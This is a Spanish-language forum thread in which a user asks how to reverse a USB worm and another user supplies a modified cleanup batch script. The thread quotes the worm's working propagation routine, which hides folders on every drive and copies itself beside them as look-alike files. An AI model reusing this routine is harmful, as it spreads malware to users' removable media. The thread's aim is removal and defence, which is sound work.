como invertir el proceso de un WORM. reproduce carpetas exe en toda la pc.

raftv79 · 27 Octubre 2009, 18:46 PM

saludo....

quien me ayuda a invertir el proceso de este programa....

1.-- O diseñar un programa que borre todos los ejecutable con el nombre de la carpet donde reside.

2.-- O un programa que cuando entre un intruso lo bloquee o me avise que quiere entrar....

bueno muchas gracias......

@echo off
::Worm USB Prop.
::by Splendit

FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF "%~d0"=="%%A" GOTO :NEXT
CALL :USB
GOTO :NEXT

:USB
FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF EXIST %%A: (
FOR /F "TOKENS=5" %%B IN ('DIR %%A:^|FIND "DIR"') DO (
ATTRIB +H %%A:\%%B
COPY /Y %0 "%%A:\%%B.EXT"
)))
GOTO :EOF

:NEXT
START %~dp0\
::RESTO DEL CODIGO DEL WORM
::
PAUSE
EXIT

Novlucker · 27 Octubre 2009, 18:55 PM

Citar1.-- O diseñar un programa que borre todos los ejecutable con el nombre de la carpet donde reside.

Ese batch no es más que "la rutina" que utilizaría un batch para propagarse, es decir, solo se copia a todas las unidades y pone ocultos los archivos. Simplemente debes de devolver los archivos a la normalidad y ya, he incluso lo puedes hacer con el mismo código.

Código (dos) [Seleccionar]

@echo off
::Worm USB Prop.
::by Splendit

FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF "%~d0"=="%%A" GOTO :NEXT
CALL :USB
GOTO :NEXT

:USB
FOR %%A in (D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z) DO (
IF EXIST %%A: (
FOR /F "TOKENS=5" %%B IN ('DIR %%A:^|FIND "DIR"') DO (
ATTRIB -H %%A:\%%B
DEL /F /Q "%%A:\%%B.EXT"
)))
GOTO :EOF

:NEXT
START %~dp0\
::RESTO DEL CODIGO DEL WORM
::
PAUSE
EXIT

Si te fijas solo he cambiado dos líneas

Citar2.-- O un programa que cuando entre un intruso lo bloquee o me avise que quiere entrar....

Eso es lo que hace un antivirus

Saludos

raftv79 · 27 Octubre 2009, 19:04 PM

DISCULPA... PERO NO VI LO QUE HICISTE... POR FAVOR EXPLICAME. NO QUEDE MUY CLARO

Novlucker · 27 Octubre 2009, 19:06 PM

Mira mejor .. solo cambie las dos líneas debajo de ..

Código (dos) [Seleccionar]

FOR /F "TOKENS=5" %%B IN ('DIR %%A:^|FIND "DIR"') DO (

Saludos

raftv79 · 27 Octubre 2009, 19:22 PM

Ya lo vi....

Hey muchas gracias.... De verdad.. Gracias...

Solo una pregunta mas...: antes de probarlo: solo borrará los ejecutable que se reproduce en cada carpeta y con el nombre de la misma y que tiene forma de carpeta? Verdad? Y disculpa mi ignorancia....

Nota del mod: no escribir en mayúsculas por favor, es = a gritar

Novlucker · 27 Octubre 2009, 19:41 PM

No tengo idea, he puesto lo opuesto a tu script, pero eso no me asegura que si tienes un virus este haciendo algo más, para empezar ahí solo se copia a los directorios dentro de las unidades, pero no se si tiene icono de carpeta o no (diría que no ya que es un bat).

Saludos

Test Foro de elhacker.net SMF 2.1

como invertir el proceso de un WORM. reproduce carpetas exe en toda la pc.

raftv79

Novlucker

raftv79

Novlucker

raftv79

Novlucker